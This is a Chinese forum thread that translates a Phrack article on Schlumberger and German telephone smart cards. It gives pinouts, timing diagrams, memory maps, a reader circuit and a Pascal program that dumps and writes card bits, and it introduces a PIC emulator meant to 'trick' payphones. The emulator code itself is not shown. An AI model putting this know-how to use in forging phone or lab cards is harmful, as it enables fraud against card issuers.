|
阅读:751回复:7
做出自己的“上机卡”(电子系,大3以上)
我可是第一次翻译这样的文章,可能有错误的地方,所以做的E汉对照,哪位看
出什什么毛病。请把更正的回复在下边,还有啊,如果有谁看了觉得 有用,还做做出了自己的电话卡或者你用类似的方式“黑”了上机卡之类的,告诉我一 声哦。关于为什么是大三,我想一般一定的专业知识,根据我们学校电子系的课程安排,大三 才会有《微机接口》,我向有了一些专业知识看这个东西就不会那么吃力了。 ==Phrack Magazine== Volume Seven, Issue Forty-Eight, File 10 of 18 Electronic Telephone Cards: How to make your own! ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ I guess that Sweden is not the only country that employs the electronic phone card systems from Schlumberger Technologies. This article will explain a bit about the cards they use, and how they work. In the end of this article you will also find an UUEncoded file which contains source code for a PIC16C84 micro-controller program that completely emulates a Schlumberger Telephone card and of course printed circuit board layouts + a component list... But before we begin talking seriously of this matter I must first make it completely clear that whatever you use this information for, is entirely YOUR responsibility, and I cannot be held liable for any problems that the use of this information can cause for you or for anybody else. In other words: I give this away FOR FREE, and I don't expect to get ANYTHING back in return! 我猜瑞典并不是世界上唯一一个使用Schlumberger Technologies的电子电话卡 的国家。这篇文章将对他们用的卡作一点说明,以及他们的工作原理。在这篇文章的 最后你会发现一个经过UUEncoded过的文章, 其中包含了一个PIC16C84微控制器程序 的原代码,它能够完全的模拟一个Schlumberger电话卡,当然也有印刷版线路图和以及 元件列表。。。但是在我们认真开始讨论这个问题之前,我必须要清楚的申明,不论 你将怎么利用我提供的信息,那都是你自己的责任,我不能对你或者其他任何人在使用 这些知识后所造成的任何问题负责。或者说:我免费地提供这些知识,但是我不希望有 任何的回报! The Original Telephone Card: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 最初的电话卡 Since I probably would have had a hard time writing a better article than the one Stephane Bausson from France wrote a while ago, I will not attempt to give a better explanation than that one; I will instead incorporate it in this phile, but I do want to make it clear that the following part about the cards technical specification was not written by me: Merely the parts in quotes are things added by me... Instead I will concentrate on explaining how to build your own telephone card emulator and how the security measures in the payphone system created by Schlumberger Technologies work, and how to trick it... But first, let's have a look at the technical specifications of the various "smart memory card" systems used for the payphones. 因为我在法国的Stephane Bausson已经写了一篇后要想写一篇更好的会比较的困难, 所以我不会尝试比那篇给出更好的阐述了, 但是我要清楚申明接下来的关于电话卡 技术的部分并非出自我手:只是引用的部分是我加上去的。。。而我是要集中在阐述 如果制作你自己的电话卡模拟器,以及怎样安全的在基于Schlumberger Technologies 技术的付费电话上测试,和怎样欺骗这个系统。。。但是首先,我们先看看负费电话 所使用的不同的“smart menory system”的技术规范。 ---------------------------------------------------------------------------- -- ============================================================================ === What you need to know about electronics telecards 你需要了解电子卡的什么内容 ============================================================================ === (C) 10-07-1993 / 03-1994 Version 1.06 Stephane BAUSSON Email: [email protected] Smail: 4, Rue de Grand; F-88630 CHERMISEY; France Phone: (33)-29-06-09-89 ---------------------------------------------------------------------------- --- Any suggestions or comments about phonecards and smart-cards are welcome ---------------------------------------------------------------------------- --- Content --------- 目录 I ) The cards from Gemplus, Solaic, Schlumberger, Oberthur: 来自Gemplus,Solaic,Schlumberger,Onerthur的卡 I-1) Introduction: 导言 I-2) SCHEMATICS of the chip: 芯片图 I-3) PINOUT of the connector: 连接器的接脚 I-4) Main features: 主要特征 I-5) TIME DIAGRAMS: 时间图 I-6) Memory MAP of cards from France and Monaco: 法国和摩纳哥卡的内存印象 图 I-5) Memory MAP of cards from other countries: 其他国家的卡的内存印象图 II ) The cards from ODS: (German cards) II-1) Introduction: II-2) Pinout: II-3) Main features: II-4) Time Diagrams: II-5) Memory Map: II-6) Electrical features: III) The Reader Schematic: IV) The program: ---------------------------------------------------------------------------- --- I ) The cards from Gemplus, Solaic, Schlumberger, Oberthur: (French cards) ====================================================================== 来自Gemplus,Solaic,Schlumberger,Onerthur的卡(法国型卡) I-1) Introduction: ------------ You must not think that the electronics phone-cards are completely secret things, and that you can not read the information that is inside. It is quite false, since in fact an electronic phonecard does not contain any secret information like credit cards, and an electronic phonecard is nothing else than a 256 bit EPROM with serial output. 你一定认为电子电话卡是个秘密的东西,而你也可能从里面读信息。那就完全错 了 因为电话卡并并不象信用卡一样保存了秘密的信息,其实它跟一个具有串行输出的25 6位 的EPROM没什么区别 Besides do not think that you are going to refill them when you understand how they work, since for that you should reset the 256 bits of the cards by erasing the whole card. But the chip is coated in UV opaqued resin even if sometimes you can see it as transparent! Even if you were smart enough to erase the 256 bits of the card you should program the manufacturer area, but this is quite impossible since these first 96 bits are write protected by a lock-out fuse that is fused after the card programming in factory. 另外呢,你不要以为你在懂得了它的工作原理只后你就可以从新填充卡了, 因为要这样做,你需要抹去整个卡的信息而从新设置他的256个比特位。但是,这个 芯片涂抹了一层UV树脂涂层即使你能看到这个芯片!即使你很聪明, 你抹去了256比特 位,但你必须要对芯片的厂商设定区进行编程,但这是不太可能的。因为前96比特位 在工厂编制了数据后就用熔断保险丝的方式作了写保护了! Nevertheless it can be very interesting to study how these cards work, to see which kind of data are inside and how the data are mapped inside or to see how many units are left inside for example. Besides there are a great number of applications of these cards when there are used (only for personal usage of course) , since you can use them as key to open a door, or you can also use them as key to secure a program, etc... 然而,了解这些卡的工作原理是很有趣的,例如看看里面什么类型的数据,这些 数据是怎样映射在内部的,看看里面用多少单元等等。此外,现成有大量的针对这些 卡的应用程序(当然都是个人使用的了),或者你也可以把它作为一个保护这个程序 的钥匙,等等。。 These Telecards have been created in 1984 and at this time constructors decided to build these cards in NMOS technology but now, they plan to change by 1994 all readers in the public to booths and use CMOS technology. Also they plan to use EEPROM to secure the cards and to add many useful informations in, and you will perhaps use phone cards to buy you bread or any thing else. 这些卡是在1984年发明的,在那个时候制造者计划用NMOS(N沟道金属氧化物 半导体)技术来制造卡,但是,他们在1994年改变了主意而选CMOS技术了。同样, 他们也计划用EEPROM(电可搽可变成ROM)来保护和为卡卡加入大量的可用信息, 所以你就可以用电话卡来买面包和其他的任何东西了。 These cards are called Second Generation Telecards. 这些卡被称为第二代卡 I-2) SCHEMATICS of the chip: ---------------------- 芯片图 (SUNLX说:端口的术语不用我翻译了吧;)) .-------------------. | | --|> Clk | | _ | --| R/W | | | --| Reset | | | --| Fuse | | | --| Vpp | | | | | '-. .-' | | .-------------------. | Out |-- serial output '-------------------' I-3) PINOUT of the connector: ------------------------- 连接器的接脚 AFNOR CHIP ISO CHIP ---------- -------- (SUNLX注:AFNOR是法国标准化组织协会的缩写) 这个还用说?国际标准 化组 了。 -------------+------------- -------------+------------- | 8 | 4 | | 1 | 5 | | | | | | | +-------\ | /-------+ +-------\ | /-------+ | 7 +----+----+ 3 | | 2 +----+ + 6 | | | | | | | | | +--------| |--------+ +--------| |--------+ | 6 | | 2 | | 3 | | 7 | | + +----+ | | +----+----+ | +-------/ | \-------+ +-------/ | \-------+ | 5 | 1 | | 4 | 8 | | | | | | | -------------+------------- -------------+------------- SUNLX说:对照了一下,我们在学校买 的就 这种卡乐;) NB: only the position of the chip is IS O standardized and not the pinout PINOUT: 1 : Vcc = 5V 5 : Gnd ------ 2 : R/W 6 : Vpp = 21V 3 : Clock 7 : I/O 4 : Reset 8 : Fuse I-4) Main features: 主要特征 --------------- - Synchronous protocol. 同步协议 - N-MOS technology. N-MOS技术 - 256x1 bit organization. - 96 written protected by a lock-out fuse. - Low power 85mW in read mode. 读模式下为85毫瓦的低能量 - 21 V programming voltage. 21 V的编程电压 - Access time: 500ns 存取时间500ns - Operating range: -100C +700C 操作范围 - Ten year data retention. 十年的数据保持 I-5) TIME DIAGRAMS: 时间图 --------------- 呵呵,电工学没学好看这个有点难:) +21V _____________ +5V ____________________________________| |_________________ Vpp : : +5V ___________________:_____________:_________________ Res et 0V ________________| : : : : : +5V ____ : ____ : ______:______ 0V ___| |_______:_____| |________:______| : |__________ Clo ck : : : : : : : : : +5V : : : : : :______:______: : _ 0V ___:____:_______:_____:____:________| : |______:__________ R/W : : : : : : : : : +5V : : :_____: :________: : : :__________ 0V XXXXXXXXXXXXXXXXX_____XXXXXX________XXXXXXXXXXXXXXXXXXXXXX__________ Out : : : : : :<-----><---->: : : : : : : :10 to 10 to : : : : : : :50 ms 50ms : Reset Bit 1 Bit2 Bit 3 card reading reading Bit2 writing to 1 reading I-6) MEMORY MAP of cards from France and Monaco: -------------------------------------------- 法国和摩纳哥卡的内存印象图 Bytes Bits Binary Hexa 字节 位 二进制数 16进制数 +-----------+-----+ 1 1 --> 8 | | | ---> Builder code. +-----------+-----+ 2 9 --> 16 | 0000 0011 | $03 | ---> a French telecard +-----------+-----+ 3 17 --> 24 | | | +-----------+-----+ 4 25 --> 32 | | | +-----------+-----+ 5 33 --> 40 | | | +-----------+-----+ 6 41 --> 48 | | | +-----------+-----+ 7 49 --> 56 | | | +-----------+-----+ 8 57 --> 64 | | | +-----------+-----+ 9 65 --> 72 | | | +-----------+-----+ 10 73 --> 80 | | | +-----------+-----+ 11 81 --> 88 | | | +-----------+-----+ 12 33 --> 40 | 0001 0011 | $13 | ---> 120 units card | 0000 0110 | $06 | ---> 50 units card | 0000 0101 | $05 | ---> 40 units card +-----------+-----+ 13-31 97 --> 248 | | | ---> The units area: each time a uni t | | | is used, then a bit is set to " 1"; | | | Generally the first ten units a re | | | fused in factory as test. | | | 单元区域:每次一个单元使用的时候 ,?br> 一个比特 | | | 位设为“1”,一般的,前10个单元 在工 测试的时候 | | | 被熔断了。 +-----------+-----+ 32 249 --> 256 | 1111 1111 | $FF | ---> the card is empty 卡为空 +-----------+-----+ |
|
|
|
1C#
发布于:2002-10-15 22:32
Re:做出自己的“上机卡”(电子系,大3以上)
II ) The cards from ODS, Giesecke & Devrient, ORGA Karten systeme,
============================================================= ODS, Giesecke & Devrient, ORGA Karten systeme,: =========================================================== 来自ODS, Giesecke & Devrient, ORGA Karten systeme, ODS, Giesecke & Devrient, ORGA Karten systeme的卡: II-1) Introduction: ------------ 介绍: These cards are in fact 128 bit memory in NMOS technology, and the map of these cards are the following: 这些卡有采用NMOS技术的128位存储空间,他们的内存对应图如下: 64 bit EPROM written protected (manufacturer area). 64位采用EPROM写保护(制造商工作区) 40 bit EEPROM (5x8 bits). 40位的EEPROM,后面括号里大概就是指应该是5个字节吧 24 bits set to "1". 24位预设为1 II-2) Pinout: -------- 管脚: ISO 7816-2 这里重点说尺寸和触点规格 相关标准的说明: ISO 7816: 1—物理特性;2—尺寸、触点规格(数量和位置); 3—与读写器间使用的电子信号和通讯协议; 4—档案及交换命令;5—Number System and Registration 6—Inter-Industry Data Elements. -------------+------------- | 1 | 5 | Pinout: 这个不用说了吧?对着图 一看就懂。 | | | ------- +-------\ | /-------+ | 2 +----+ + 6 | 1 : Vcc = 5V 5 : Gnd | | | | 2 : Reset 6 : n.c. +--------| |--------+ 3 : Clock 7 : I/O | 3 | | 7 | 4 : n.c. 8 : n.c. | +----+----+ | +-------/ | \-------+ n.c. : not connected | 4 | 8 | | | | -------------+------------- II-3) Main features: --------------- 主要特性: - ISO 7816- 1/2 compatible. 兼容ISO7816 - use a single 5V power supply. 使用单5V电源供电 - low power consumption. 低功耗 - NMOS technology. 使用NMOS技术 II-4) Time Diagrams: ---------------- 时序图: Reset: ------ 复位: The address counter is reset to 0 when the clock line CLK is raised while the control line R is high. Note that the address counter can not be reset when it is in the range 0 to 7. 当Reset为高电平,且时钟脉冲有上升沿时,地址计数器被置为0(不过看图上好像是 下降沿的时候置位的,好奇怪的说)。注意,地址计数器在0到7的范围内时不能重新置 位。 __________________ _____| |_____________________________________________ Reset : : : _____ : _____ _____ _____ _____ _____:_______| |____:_| |_____| |_____| |_____| |_ Clk : : : : : : : : : : : _____:_______:__________:_:_____:_____:_____:_____:_____:_____:_____:_ _____:___n___|_____0____:_|_____1_____|_____2_____|_____3_____|___4_:_ (Addres s) : : : : : : _____: :_______:___________:___________:___________:_ _____XXXXXXXXXXXXXXXXXXXX_______|___________|___________|___________|_ Data Bit n Bit 0 Bit 1 Bit2 Bit3 The address counter is incremented by 1 with each rising edge of the clock signal Clk, for as long as the control line R remains low. The data held in each addressed bit is output to I/O contact each time Clk falls. It is not impossible to decrement the address counter, therefore to address an earlier bit, the address counter must be reset then incremented to require value. 只要复位电平保持低,地址计数器每碰到时钟脉冲上升沿就自增1。每当时钟脉 冲下降时,在每个地址位里保持的数据就要输出到I/O。地址计数器是不能减少的, 因此为了指向一个较靠前的位时,必须复位,然后地址计数器再自加到所需要的值。 Write: ------ 写入: All unwritten or erased bits in the address 64-104 may be unwritten to. When a memory cell is unwritten to, it is set to 0. The addressed cell is unwritten to by the following sequence. 所有的不可写的,或者是在地址64-104间,已擦除的位可能是不可写的。当 一个内存单元是不可写时,它就被置位为0。地址单元在以下集中情况下是不可写 的。 1- R is raised while Clk is low, to disable address counter increment for one clock pulse. 1-当Reset为高,而Clk为低,禁止地址计数器在每个时钟脉冲时自加。 2- Clk is then raised for a minimum of 10ms to write to the address bit. 2-Clk高电位最短10ms。 When to write operation ends, and Clk falls, the address counter is unlocked, and the content of the written cell, which is now 0, is output to I/O contact if the operation is correct. 当写操作结束,时钟电平下降时,地址计数器解除锁定,如果操作无误,被写入单元 的内容(现在为0),就被输出到I/O。 The next Clk pulse will increment the address by one, then the write sequence can be repeated to write the next bit. 下一个时钟周期又会使地址自加1,这时写序列就可以重复写下一个单元了。 _____ _____ ____________| |______________________________| |_______________ Reset : : ___ : _____ ___ : _____ ___| |____:__________| |_________| |_____:__________| |____ Clk : : : : : : : : : ___:________:__________:_____:_________:___:_____:__________:_____:_____ n | n+1 | n+2 | : n+3 | : (Addr ) ---'--------:----------'-----:---------'---:-----:----------'-----:----- : : : : : : : ________ _: : : ____________: ___: : : ________XXX_XXXXXXXXXXXXXXXXXXX____________ XX___XXXXXXXXXXXXXXXXXXXXXXX I/O n n+1 : : n+1 n+2 : : : : : : write write WriteCarry: ----------- 写传送: A counter is erased by performing the WRITECARRY sequence on the stage of the next highest weighing to that to be erased. 在下一个highest weighing to that to be erased执行写传送序列,就会把 计数器清除。 The writecarry sequence is as follows: 写传送序列描述如下: 1 - Set the address counter to an unwritten bit in the next highest counter stage to that to be erased. 1-将地址计数器设置在下一个最高的计数器中的不可写位。 2 - Increment is disabled on the following rising edge of R where Clk remains low. 2-当Clk保持低时,Reset的上升沿并不触发自增1操作。 3 - Clk is then raised for a minimum of 10ms, while R is low, to write to the next address bit. 3-接下来,时钟脉冲会上升最少10ms,当R为低时,写下一个地址位。 4 - R is the raised again while Clk remains low to disable increment a second time. 4-R再次升高,同时Clk保持低,第二次禁止自增操作。 5 - Clk is the raised for a minimum of 1ms, while R is low, to write to the addressed bit a second time, erasing the counter level immediately below that the addressed bit. _____ _____ ______| |____________________| |_________________________________ Rst : : : _______ : _______ ___ ______:___________| |______:_____________| |______| |______ Clk : : : : : : : : : : : : : : : : <------------------------- address n ------------------------>:<--- n+1 ------ : : : : : : : : : : : : : : ______: : :______: : :__________: _____ ______XXXXXXXXXXXXXXXXXXXXX______XXXXXXXXXXXXXXXXXXXXXXX__________XX_____ I/O : : n : : n n+1 : : : : Write Erase II-5) Memory Map: ------------- Bytes Bits Binary Hexa +-----------+-----+ 1 1 --> 8 | | | +-----------+-----+ 2 9 --> 16 | 0010 1111 | $2F | ---> Germany 德国 | 0011 0111 | $37 | ---> Netherland | 0011 1011 | $3B | ---> Greece 希腊 +-----------+-----+ 3 17 --> 24 | | | 4 25 --> 32 | | | ---> Issuer area (written protected) 5 33 --> 40 | | | (发行者写入区,写保护) 6 41 --> 48 | | | 7 49 --> 56 | | | 8 57 --> 64 | | | +-----------+-----+ 9 65 --> 72 | | | ---> c4096 ) 10 73 --> 80 | | | ---> c512 ) 11 81 --> 88 | | | ---> c64 ) 5 stage octal counter 12 89 --> 96 | | | ---> c8 ) 5个八进制的计数器 13 97 --> 104 | | | ---> c0 ) +-----------+-----+ 14 105 --> 112 | 1111 1111 | $FF | 15 113 --> 120 | 1111 1111 | $FF | ---> area of bits set to "1" 16 120 --> 128 | 1111 1111 | $FF | +-----------+-----+ The Issuer area: ---------------- 发行商区: This issuer consists of 40 bits. The contents of the issuer area are specified by the card issuer, and are fixed during the manufacturing process. The contents of the issuer area will include data such as serial numbers, dates, and distribution centers. This area may only be read. 这个区域包括40位。这部分关于发行商的内容由发行商写入,其中固化了制造商 的程序。这部分内容包括串号,日期和发行中心的有关数据。 这个区域可能是只读的。 The Counter area: ----------------- 计数器区: The counter area stores the card's units. Its initial value is specified by the card issuer and set during manufacturing. The counter area is divided into a 5 stage abacus. Note that you can only decrease the counter and it is not authorized to write in the counter a value greater than the old value. 这个计数器区存储了这个卡的单元。它的初始数值被发行商在生产过程中写入。 这个区域被划分为5个计数区。 注意,你只能将计数器递减,它并没有给你写入一个比前驱值更大的数值的权限。 I-6) Electrical features: -------------------- 电气特性: Maximum ratings: ---------------- 最大变化幅度: 符号 最小值 最大值 单位 +--------+------+------+------+ | Symbol | Min | Max | Unit | +----------------------+--------+------+------+------+ | Supply voltage | Vcc | -0.3 | 6 | V | 供电电压 +----------------------+--------+------+------+------+ | Input voltage | Vss | -0.3 | 6 | V | 输入电压 +----------------------+--------+------+------+------+ | Storage temperature | Tstg | -20 | +55 | 0C | 存储温度 +----------------------+--------+------+------+------+ | Power dissipation | Pd | - | 50 | mW | 功耗 +----------------------+--------+------+------+------+ DC characteristics: ------------------ 直流特性: +--------+-----+-----+-----+------+ | Symbol | Min.| Typ.| Max.| Unit | +---------------------------+--------+-----+-----+-----+------+ | Supply current | Icc | - | - | 5 | mA | +---------------------------+--------+-----+-----+-----+------+ | Input Voltage (low) | Vl | 0 | - | 0.8 | V | +---------------------------+--------+-----+-----+-----+------+ | Input voltage (high) | Vh | 3.5 | - | Vcc | V | +---------------------------+--------+-----+-----+-----+------+ | Input current R | Ih | - | - | 100 | uA | +---------------------------+--------+-----+-----+-----+------+ | Input current Clk | Il | - | - | 100 | uA | +---------------------------+--------+-----+-----+-----+------+ | Output current (Vol=0.5V) | Iol | - | - | 10 | uA | +---------------------------+--------+-----+-----+-----+------+ | Output current (Voh=5V) | Ioh | - | - | 0.5 | mA | +---------------------------+--------+-----+-----+-----+------+ AC characteristics: ------------------ 交流特性: +--------+------+------+------+ | Symbol | Min. | Max. | Unit | +----------------------+--------+------+------+------+ | Pulse duration | tr | 50 | - | us | 使R地址复位的脉冲 持续时间 | R address reset | | | | | +----------------------+--------+------+------+------+ | Pulse duration | ts | 10 | - | us | 使R写时,脉冲所持 续时间 | R write | | | | | +----------------------+--------+------+------+------+ | High level Clk | th | 8 | - | us | 高频时钟脉冲 +----------------------+--------+------+------+------+ | Low level Clk | tl | 12 | - | us | 低频时钟脉冲 +----------------------+--------+------+------+------+ | Write window | Twrite | 10 | - | ms | 写窗口 +----------------------+--------+------+------+------+ | Erase window | Terase | 10 | - | ms | 擦除窗口 +----------------------+--------+------+------+------+ | | tv1 | 5 | - | us | +----------------------+--------+------+------+------+ | | tv2 | 3.5 | - | us | +----------------------+--------+------+------+------+ | | tv3 | 3.5 | - | us | +----------------------+--------+------+------+------+ | | tv4 | 3.5 | - | us | +----------------------+--------+------+------+------+ | | tv5 | 3.5 | - | us | +----------------------+--------+------+------+------+ | | tv6 | 5 | - | us | +----------------------+--------+------+------+------+ | | tv7 | 5 | - | us | +----------------------+--------+------+------+------+ | | tv8 | 10 | - | us | +----------------------+--------+------+------+------+ III) The Reader Schematic: ====================== 读写模块示意图: External 5V (Optional) 外加5V电压(可选择) 5V o------, | / T2 PNP d13 r7 10 0V o--, | / BC 177 |\ | _____ | | ,-------o/ o--*------. E C .--| >+-[_____]--------, __+__ | | | \ / |/ | | \\\\\ | __|__ Battery | \ / | | - 22.5V | --------- | ........ | | | _____ | _____ | : | __+__ +--[_____]--*--[_____]--, | D2 : | \\\\\ r6 150k r5 15k | | 4 o-------|---------------------------*------------------|-------------, | : | | r3 220k / C | | Ack : | | _____ |/ T1 - NPN | | 10 o------|--------. '--[_____]-*---| BC107 | | : | | _____ | |\ | | : ,-, ,-, +--[_____]-' \ E | | : | |r2 | |r1 | r4 390k | | | : | |220 | |22k __+__ __+__ | | : |_| |_| \\\\\ \\\\\ | | : | |\ | | | | : *--| >+--|----------------*----------------------------------|--* : | |/ | | ,-----|-----------------------------, | | : | d1 | | | ,----------,----------, | | | : | | | *---|--* Fuse | Reset *--|---' | | : | | | | |----------|----------| | | D0 : | | | ,-|---|--* I/O | Clk *--|---, | | 2 o-------|--------|----------' | | |----------|----------| | | | : | | | '---|--* Vpp | R/W *--|---|----' | Busy : | | | |----------|----------| | | 11 o------|--------|--------------' ,---|--* Gnd | 5V * | | | : | | | '----------'-------|--' | | D1 : | | __+__ Chip connector | | | 3 o-------|--------|--------, \\\\\ | | | : | | '------------------------------|------' | Str : | |\ | | | | 1 o-------*--| >+--*----*----*----*----*-------------------' | : d2|/ | |d3 |d4 |d5 |d6 |d7 | : -+- -+- -+- -+- -+- | : /_\ /_\ /_\ /_\ /_\ | D3 : | | | | | |\ | d8 | 5 o----------------*----|----|----|----|---| >+-------*-------------------' : | | | | |/ | | : | | | | | D4 : | | | | |\ | d9 | 6 o---------------------*----|----|----|---| >+-------* : | | | |/ | | : | | | | D5 : | | | |\ | d10 | 7 o--------------------------*----|----|---| >+-------* : | | |/ | | : | | | D6 : | | |\ | d11 | 8 o-------------------------------*----|---| >+-------* : | |/ | | : | | D7 : | |\ | d12 | 9 o------------------------------------*---| >+-------' : |/ | : : 25 o------. : | ........: | d1 to d13: 1N4148 __+__ \\\\Centronics port |
|
|
|
2C#
发布于:2002-10-15 22:34
Re:做出自己的“上机卡”(电子系,大3以上)
IV) The program:
=========== 程序:(这个不用我多说了吧,计算机专业的强项。这个语言,我们是学过的,谁说pascal没有用了??) The following program will enable you to read telecards on you PC if you build the reader. 下面的程序让你可以在你的计算机上可以读取电话卡上的信息。(可能是和上面的 读写器电路对应的) --------------- cut here (begin) {***************************************************************************** } { T E L E C A R D . PAS } {***************************************************************************** } { This program enable you to dumb the memory of electronics phonecards } { from all over the world, so that you will be able to see which country } { the card is from how many units are left and so on .... } {***************************************************************************** } { } { Written by Stephane BAUSSON (1993) } { } { Email: [email protected] } { } { Snail Mail Address: 4, Rue de Grand } { F-88630 CHERMISEY } { France } { } {***************************************************************************** } {* Thanks to: Tomi Engdahl ([email protected]) * } {***************************************************************************** } USES crt,dos; CONST port_address=$378; { lpr1 chosen } TYPE string8=string[8]; string2=string[2]; VAR reg : registers; i,j : integer; Data : array[1..32] of byte; car : char; byte_number : integer; displaying : char; {----------------------------------------------------------------------------- } PROCEDURE Send(b:byte); BEGIN port[port_address]:=b; END; {----------------------------------------------------------------------------- } FUNCTION Get:byte; BEGIN get:=port[port_address+1]; END; {----------------------------------------------------------------------------- } { FUNCTION dec2hexa_one(decimal_value):hexa_character_representation; } { } { - convert a 4 bit long decimal number to hexadecimal. } {----------------------------------------------------------------------------- } FUNCTION dec2hexa_one(value:byte):char; BEGIN case value of 0..9 : dec2hexa_one:=chr(value+$30); 10..15 : dec2hexa_one:=chr(value+$37); END; END; {----------------------------------------------------------------------------- } { FUNCTION d2h(decimal_byte):string2; } { } { - convert a decimal byte to its hexadecimal representation. } {----------------------------------------------------------------------------- } FUNCTION d2h(value:byte):string2; VAR msbb,lsbb:byte; BEGIN msbb:=0; if ( value >= $80 ) then BEGIN msbb:=msbb+8; value:=value-$80; END; if ( value >= $40 ) then BEGIN msbb:=msbb+4; value:=value-$40; END; if ( value >= $20 ) then BEGIN msbb:=msbb+2; value:=value-$20; END; if ( value >= $10 ) then BEGIN msbb:=msbb+1; value:=value-$10; END; lsbb:=0; if ( value >= $08 ) then BEGIN lsbb:=lsbb+8; value:=value-$08; END; if ( value >= $04 ) then BEGIN lsbb:=lsbb+4; value:=value-$04; END; if ( value >= $02 ) then BEGIN lsbb:=lsbb+2; value:=value-$02; END; if ( value >= $01 ) then BEGIN lsbb:=lsbb+1; value:=value-$01; END; d2h := dec2hexa_one(msbb) + dec2hexa_one(lsbb); END; {----------------------------------------------------------------------------- } Function Binary( b : byte):string8; var weight : byte; s : string8; BEGIN weight:=$80; s:=''; while (weight > 0) do BEGIN if ((b and weight) = weight) then s:=s+'1' else s:=s+'0'; weight:=weight div $02; END; Binary:=s; END; {----------------------------------------------------------------------------- } FUNCTION Units:byte; VAR u, i : integer; s : string8; BEGIN u:=0; i:=13; while (Data = $FF) do BEGIN u:=u+8; i:=i+1; END; s:=Binary(Data); while(s[1]='1') do BEGIN inc(u); s:=copy(s,2,length(s)); END; units:=u; END; {----------------------------------------------------------------------------- } function Units_2:LongInt; BEGIN Units_2:=4096*Data[9]+512*Data[10]+64*Data[11]+8*Data[12]+Data[13]; END; {----------------------------------------------------------------------------- } PROCEDURE Card_Type; BEGIN case Data[2] of $03: BEGIN write('Telecard - France - '); case Data[12] of $13: write('120 Units - ',units-130,' Units left'); $06: write('50 Units - ',units-60,' Units left'); $15: write('40 Units - ',units-40,' Units left'); END; END; $2F:BEGIN write('Telecard - Germany - ', Units_2, ' Units left'); END; $3B:BEGIN write('Telecard - Greece - ', Units_2, ' Units left'); END; $83:BEGIN write('Telecard'); case Data[12] of $1E: write(' - Sweden'); $30: write(' - Norway'); $33: write(' - Andorra'); $3C: write(' - Ireland'); $47: write(' - Portugal'); $55: write(' - Czech Republic'); $5F: write(' - Gabon'); $65: write(' - Finland'); END; if (Data[12] in [$30,$33,$3C,$47,$55,$65]) then BEGIN case ((Data[3] and $0F)*$100+Data[4]) of $012: write (' - 10 Units - ',units-12,' Units left' ); $024: write (' - 22 Units - ',units-24,' Units left' ); $027: write (' - 25 Units - ',units-27,' Units left' ); $032: write (' - 30 Units - ',units-32,' Units left' ); $052: write (' - 50 Units - ',units-52,' Units left' ); $067: write (' - 65 Units - ',units-62,' Units left' ); $070: write (' - 70 Units - ',units-70,' Units left' ); $102: write (' - 100 Units - ',units-102,' Units lef t'); $152: write (' - 150 Units - ',units-152,' Units le ft'); END; END; { write(' - N0 ',Data[5]*$100+Data[6]);} END; END; END; {----------------------------------------------------------------------------- } PROCEDURE waiting; BEGIN send($00); write('Enter a card in the reader and press a key ...'); repeat until key pressed; gotoxy(1, wherey); clreol; END; {----------------------------------------------------------------------------- } PROCEDURE Full_Displaying; BEGIN writeln('Memory dump:'); for i:=1 to 80 do write('-'); for i:=1 to (byte_number div 6 + 1) do BEGIN for j:=1 to 6 do BEGIN if j+6*(i-1) <= byte_number then write(binary(Data[j+6*(i- 1)]):9); END; gotoxy(60,wherey); for j:=1 to 6 do if j+6*(i-1) <= byte_number then write(d2h(Data[j+6*(i-1)]),' ') ; writeln; END; for i:=1 to 80 do write('-'); Card_Type; writeln; END; {----------------------------------------------------------------------------- } PROCEDURE Short_Displaying; VAR j : integer; BEGIN for j:=1 to byte_number do BEGIN write(d2h(Data[j]),' '); END; writeln; END; {----------------------------------------------------------------------------- } PROCEDURE Reading; VAR i, j : integer; Value : byte; BEGIN send($FE); send($F8); for i:=1 to 32 do BEGIN Value:=0; for j:=1 to 8 do BEGIN Value:=Value*$02 + ((get and $08) div $08); send($FB); delay(1); send($F8); END; Data:=Value; END; case displaying of 'F':full_displaying; 'S':short_displaying; END; END; {----------------------------------------------------------------------------- } PROCEDURE writing; VAR i,n:integer; car:char; BEGIN write('Which bit do you want to set to "1" : '); readln(n); waiting; car:=readkey; send($FA); send($F8); for i:=1 to n do BEGIN send($F9); if i=n then BEGIN send($FD); delay(20); send($FF); delay(20); END; send($FB); END; reading; END; {----------------------------------------------------------------------------- } PROCEDURE Saving; VAR filename : string; f : text; i : word; BEGIN write('Enter the filename: '); readln(filename); assign(f, filename); rewrite(f); for i:=1 to byte_number do write(f,d2h(Data),' '); close(f); END; {----------------------------------------------------------------------------- } PROCEDURE initialize; VAR i : integer; BEGIN byte_number:=32; displaying:='F'; clrscr; writeln(' 1 - to dump a 256 bits card'); writeln(' 2 - to dump a 128 bits card'); writeln(' F - to display in full format'); window(41,1,80,25); writeln(' S - to display in short format'); writeln(' F2 - to save in a file'); writeln(' Q - to exit the program'); window(1,4,80,25); for i:=1 to 80 do write('='); window(1,5,80,25); END; {============================================================================= } BEGIN initialize; repeat waiting; car:=upcase(readkey); case car of 'W':writing; 'Q':; '1':byte_number:=32; '2':byte_number:=16; 'F','S':displaying:=car; #00: BEGIN car:=readkey; if car=#60 then saving; END; else reading; END; until car='Q'; END. --------------- cut here (end) |
|
|
|
3C#
发布于:2002-10-15 22:36
Re:做出自己的“上机卡”(电子系,大3以上)
The Program:
~~~~~~~~~~~~ Well, when I saw this phile about the cards the first time, about a year ago I quickly realized that this system is very unsecure and really needs to be hacked. So, now I present you with a piece of software for the PIC 16C84 RISC micro-controller from Microchip that will take care of emulating the cards used by Schlumberger and others. 在一年前我第一次看到关于电话卡的文章时,我很快就意识到这个系统时非常不安 全的,也是很有必要来hack一下它的。因此,我附送使用mircrochip公司出品的 PIC16C84 RISC单片机编制的程序,它可以为你仿真出Schlumberger和其他一些公司 生产的卡的使用过程。 This system is to be found in Scandinavia (Sweden, Norway and Finland), Spain, France and other countries. I do know that France probably needs some small modifications for this to work, but I see no reason to as why it shouldn't do so! 这类电话卡系统可以在Scandinavia半岛(瑞典,挪威和芬兰),以及西班牙,法国 和其他一些国家找到。我也知道对于法国的系统,也许要针对它作一些小小的修改, 但我看不出有什么理由为什么不这样作。 For this to work, you need to have access to a PROM burner which can handle the PIC 16C84, or you might just build one yourself as I include some plans for that in the UUEncoded block to be found at the end of this phile. First of all, you have to read off the first 12 bytes of data from a valid card from the country you wish your emulator to work in. 要进行这项工作,你需要可以使用一台可以应付PIC16C84芯片PROM的编程器,或者你可 